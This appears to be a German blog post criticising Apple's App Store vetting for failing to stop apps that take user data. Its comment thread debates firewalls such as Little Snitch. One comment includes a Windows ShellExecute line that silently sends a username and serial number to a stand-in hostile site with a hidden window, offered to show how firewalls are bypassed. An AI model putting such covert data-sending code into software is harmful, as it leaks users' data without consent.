02 Okt Apple-«App Store» kein Synonym für Sicherheit

Apple präsentiert die Zensur Vorauswahl an Apps für den «iTunes Store» (auch «App Store») unter anderem als Sicherheitsgewinn. Ein Problem, das dadurch nicht angegangen wird, sind Apps, die Benutzerdaten ohne Einverständnis des Benutzers abgreifen – und während man beispielsweise auf Android-Smartphones Apps im Stil von «Little Snitch» auf dem Mac einsetzen kann um solche Apps zu identifizieren, hat Apple bislang keine entsprechende App zugelassen …

(Via «Call Me Fishmeal».)

5 Kommentare
  • Lukas
    Veröffentlicht um 14:42h, 02 Oktober Antworten

    Im eigenen WLAN gibt es wenigstens Möglichkeit die Daten welche gesendet werden wenigstens mitzuloggen, openWRT und Co. lassen grüssen :)

    Firewalls halte ich generell für eher ein Placebo da es “relativ” einfach ist diese zu umgehen. Da ich von Mac OS X spezifischer Programmierung keine grosse Ahnung habe ein kleiner Proof für MS Windows:

    LONG r = ShellExecute(NULL, "open", "http://ganzböseseite.ch/?
    name=NutzerName&serial=Seriennummer", NULL, NULL, SW_HIDE);

    Zusammenfassung: Die Seite “ganzböseseite.ch” wird vom Standardbrowser des Benutzers aufgerufen, dieser wird allerdings für den Benutzer nicht sichtbar (SW_HIDE) gestartet.

    vgl. http://support.microsoft.com/?scid=kb%3Ben-us%3B224816&x=17&y=8

    Klar, eine “fortgeschrittenere” Firewall erkennt sowas auch, aber es gibt auch noch genug andere Methoden ;) – Und solche oder ähnliche Methoden gibt es auch unter OS X, Linux, BSD und Co…

    • Martin (MacMacken)
      Veröffentlicht um 14:48h, 02 Oktober

      Im eigenen WLAN gibt es wenigstens Möglichkeit die Daten welche gesendet werden wenigstens mitzuloggen, openWRT und Co. lassen grüssen

      Sofern keine Verschlüsselung verwendet wird … und so trivial ist es auch nicht – na ja, je nach Kenntnisstand, wie immer … ;)

  • Asmus
    Veröffentlicht um 16:55h, 02 Oktober Antworten

    In wiefern dem unbedarften Nutzer LittleSnitch dabei hilft die Übertragung der Benutzerdaten zu verhindern ist fraglich – viele Programme überprüfen online ob sie legal registriert wurden oder Updates vorhanden sind; eine Unterscheidung zwischen diesem durchaus berechtigtem Netzwerkverkehr und dem potentiellen Übertragen persönlicher Daten ist mit LittleSnitch nicht möglich.

    • Martin (MacMacken)
      Veröffentlicht um 17:06h, 02 Oktober

      Es geht nicht um unbedarfte Benutzer, es geht um die Möglichkeit überhaupt. Und berechtigt ist IMHO nur Netzwerkverkehr, den ich genehmigt habe – insbesondere fragen korrekt entwickelte Anwendungen vor dem ersten Prüfen auf Aktualisierungen und übertragen auch nicht standardmässig oder gar ungefragt meine Systemdaten.

Kommentieren